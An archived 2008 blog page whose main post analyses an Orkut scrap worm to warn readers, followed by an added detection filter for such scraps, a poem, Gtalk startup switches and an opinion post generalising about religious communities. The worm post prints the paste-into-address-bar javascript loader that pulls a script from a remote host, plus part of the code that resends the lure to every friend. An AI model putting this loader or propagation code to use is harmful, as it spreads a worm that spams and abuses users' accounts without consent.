8 Feb 2008

Orkut scripts exposed

I generally do not check out the scripts sent to me in scraps by friends. But this was one script which kept coming to me from different directions, from many friends who don't know each other. So I thought it must be something worth trying, or maybe it's spam. So I took a chance and tried it out, to my utter amazement. The script did not have any effect on my browser, and that's what made me nervous, wondering if it had blown any security policies or exploited any vulnerabilities. So I searched for it and found that the scraps were not only on my scrapbook but on those of all the friends on my list. So I decided to uncover what this script does behind the scenes.

JavaScript files can be nasty pieces of code that perform whatever function they were written for. It's really worth watching out for scripts on Orkut, as you never know if a script could land you in jail under the IT Act for spreading Trojans or viruses. These scripts can run from the address bar of the browser. When you enter a script in the address bar and press Enter, the script directs you to another site or link, or maybe performs some function on the page. These scripts can also be injected into the server directly. This is called a Server Side Include (SSI) attack and injects the piece of script directly into the server. This is generally done on guestbooks, feedback forms, etc. of a website, which post messages directly to the server.

Heres the scrap:
Here are some cool pic..BY JINESH JAIN.. Just copy the JavaScript, paste it in your address bar and PRESS ENTER
javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)
trust me, you'll find this pic funny!


The javascript source code:
function SendScrapToAll()
{
    var scrapText;
    scrapText = "[blue]Here are some cool pic..BY [green]JINESH JAIN[/green].. [blue]Just copy the JavaScript, paste it in your address bar and PRESS ENTER[/blue]" +
        ""+
        "[orange]javascript:d=document;c=d.createElement('script');d.body.appendChild(c);c.src='http://tricks80.googlepages.com/20885.user.js';void(0)[/orange]"+
        ""+
        "[red]trust me, you'll find thispic funny! [:)] ";
    if(c == select.length)
        return;
    try{
        if(select[c].value!="")
        {
            sendScrap(select[c].value,scrapText);
        }
    }catch(e){
        //Suppressed Exception
    } finally {
        c = c+ 1;
        setTimeout("SendScrapToAll()", 666);
    }
}

What does the script do?
The script fetches the currently logged-on user's friends list from the Compose.aspx page, builds AJAX-based web requests and posts the scrap message to everyone on that list. And if you have more than 150 friends, sending more than 150 messages at a time will look like spamming to the Orkut admins, and you might even be blocked from accessing your Orkut account for some time.

Prevention is better than Cure
There is no definite cure for such script injection, but you can delete each scrap individually.
Inform your friends about this script, and never try such scripts in future, even if it may be tempting.
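
A scrap filter for the pattern dissected above, as an added example that is not part of the original post or of Orkut's code: it strips the colour tags, looks for a javascript: URI that builds a script element and points its src at a remote host, and reports that URL. The sample scraps, the example.invalid host and the name analyzeScrap are constructed for illustration.

```javascript
// Added example: classify scrap text for the paste-this-loader pattern.
const COLOUR_TAG = /\[\/?[a-z]+\]/gi; // [blue], [/green], ...
const JS_URI = /javascript:([^\n]*)/gi; // scheme plus the rest of the line
const MAKES_SCRIPT = /createElement\(\s*['"]script['"]\s*\)/i;
const REMOTE_SRC = /\.src\s*=\s*['"](https?:\/\/[^'"\s]+)['"]/gi;

function analyzeScrap(text) {
  const plain = text.replace(COLOUR_TAG, "");
  const result = { verdict: "ok", remoteScripts: [], reasons: [] };
  for (const m of plain.matchAll(JS_URI)) {
    const body = m[1];
    // Prose such as "JavaScript: it's fun" has no code punctuation; skip it.
    if (!/[=;(]/.test(body)) continue;
    if (result.verdict === "ok") result.verdict = "review";
    result.reasons.push("javascript: URI with an executable-looking body");
    const urls = [...body.matchAll(REMOTE_SRC)].map((s) => s[1]);
    if (MAKES_SCRIPT.test(body) && urls.length > 0) {
      result.verdict = "block";
      result.remoteScripts.push(...urls);
      result.reasons.push("injects a script element loaded from a remote host");
    }
  }
  if (result.verdict !== "ok" && /address\s+bar/i.test(plain)) {
    result.reasons.push("asks the reader to paste it into the address bar");
  }
  return result;
}

// Constructed sample scraps (example.invalid is a placeholder host).
const SAMPLE_SCRAPS = [
  "[blue]Cool pics![/blue] Paste this in your address bar and press ENTER\n" +
    "[orange]javascript:d=document;c=d.createElement('script');" +
    "d.body.appendChild(c);c.src='http://example.invalid/loader.js';void(0)[/orange]",
  "I am learning JavaScript: it's fun",
  "javascript:void(0)",
];

for (const scrap of SAMPLE_SCRAPS) {
  const r = analyzeScrap(scrap);
  console.log(r.verdict, r.remoteScripts.join(" "));
}
```

A "block" verdict means the scrap carries a loader for a remote script; "review" covers javascript: URIs that run code without loading one.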

Courtesy:
Coolwayfarer's Diary
Code Maverick

6 Feb 2008

Life's like that

i like the sound of raining..everything so silent..as in sweet slumber
do you know that if we are high up in the clouds..we won't be hearing the sound of rain..
its the sound of the water falling on the rocks, mountains, roofs, umbrella that we hear rain as
it has a sweet music in itself..have you ever listened to it?
it reflects all the sweet sounds of silence...
the leaves, the ocean, the rooftops...all singing in one tone..in life's unison
washing away all the dirt it had accumulated in all those times of sweet silence...

even if the ends of a needle are opposite to each other...that doesn't mean they are in different worlds...
the sound of rain is in fact a noise ...yet we like to hear it...we are thrilled by its noise...
music only need not be soothing to the ears...its sometimes noise that break all barriers...all silence
life is like that...

5 Feb 2008

Call conference in Gtalk

Gtalk, unlike Yahoo Messenger or other IM clients, lacks many interactive features. But you can always tweak Gtalk to get these features back. For example, you can have call conferences in Gtalk, use icons (not smileys), etc. There are many themes for Gtalk available on the internet. You can set the background image, use cool icons, make sounds like the applause in Yahoo Messenger, etc., depending on which Gtalk theme you install. I will be covering only one aspect of Gtalk, i.e. call conference. Believe me, I have tested it.

1.) Open Gtalk in one instance.
2.) Right-click the Gtalk icon on the desktop and open the properties of the Gtalk icon.
3.) Add "/nomutex" (without the quotes) at the end of the target field of the Gtalk shortcut.
4.) It should look like this: "C:\Program Files\Google\Google Talk\googletalk.exe" /nomutex
5.) This will allow you to open multiple instances of Gtalk on your system.
6.) Open 2 instances of Gtalk on every computer you wish to conference with.
7.) After this, start a chain: User 1 should connect on one instance to user 2. User 2 will connect on his second instance to user 3. User 3 will connect using his second instance back to user 1. With this chain everyone is connected to everyone.

Other Secret Startup Parameters
  • /nomutex: allows you to open more than one instance of Google Talk
  • /autostart: when Google Talk is run with this parameter, it will check the registry settings to see if it needs to be started or not. If the "Start automatically with Windows" option is unchecked, it won't start.
  • /forcestart: same as /autostart, but forces it to start no matter what option was set.
  • /S upgrade: Used when upgrading Google Talk
  • /register: registers Google Talk in the registry, including the GMail Compose method.
  • /checkupdate: check for newer versions
  • /plaintextauth: uses the plain authentication mechanism instead of Google's GAIA mechanism. Used for testing the plain method on Google's servers.
  • /nogaiaauth: disables GAIA authentication method. The same as above.
  • /factoryreset: set settings back to default.
  • /gaiaserver servername.com: uses a different GAIA server to connect to Google Talk. Used for debug purposes only, there are no other known GAIA servers.
  • /mailto email@host.com: send an email with Gmail
  • /diag: start Google Talk in diagnostic mode
  • /log: probably has something to do with the diagnostic logging
Courtesy: http://www.customizetalk.com

2 Feb 2008

Food based religious sentiments!!

Though Pune is known to be one of the largest exporters of pork in India (read it somewhere), I failed to understand why there were few restaurants which provided pork dishes! I am not against any religion or community as such, but a thought just came into my mind. In a restaurant in Pune, pork dishes were not mentioned on the menu card, though they were available. When I asked the waiter, he replied that it would hurt the religious sentiments of Muslims.

There are hardly one or two places where pork dishes are found, whereas there must be some hundreds of hotels that provide beef. Would it be fair on Hindus, then, to include beef dishes on the menu? There is no law as such that such things could or could not be mentioned on the menu; it's just a noble gesture of the restaurant owner so that customers do not feel offended.

In the same restaurant, they have beef dishes on the menu (if I remember right!), so what does that have to do with it then? My whole point is that maybe Hindu people generally don't take it too seriously when it comes to religion (except for some), whereas Muslims in general have a strict code of conduct and are religious in nature. And maybe that's why people in general don't find it hard to put beef on the menu, whereas they don't put pork on the menu! Well, that may be my observation or my point of view, which need not be taken as the truth as such. Take it as just one more comment from another person.


Disclaimer: I seriously don't have any problem or grudge with any religion. All are equal in my eyes.
